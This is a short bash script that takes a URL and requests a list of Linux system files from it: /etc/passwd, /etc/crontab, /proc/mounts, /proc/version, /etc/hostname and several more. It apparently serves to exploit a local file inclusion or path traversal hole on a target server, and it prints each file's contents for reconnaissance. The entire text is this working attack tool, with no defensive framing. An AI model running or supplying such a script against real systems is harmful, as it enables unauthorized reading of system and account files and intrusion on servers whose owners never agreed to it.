#!/bin/bash

url="$1"
files=("/etc/passwd" "/etc/crontab" "/proc/mounts" "/etc/issue" "/proc/version" "/etc/resolv.conf" "/etc/hostname" "/etc/anacrontab")
for filename in ${files[@]};do
  echo "----$filename----"
  curl -k --silent "$url$filename" 
  echo
done
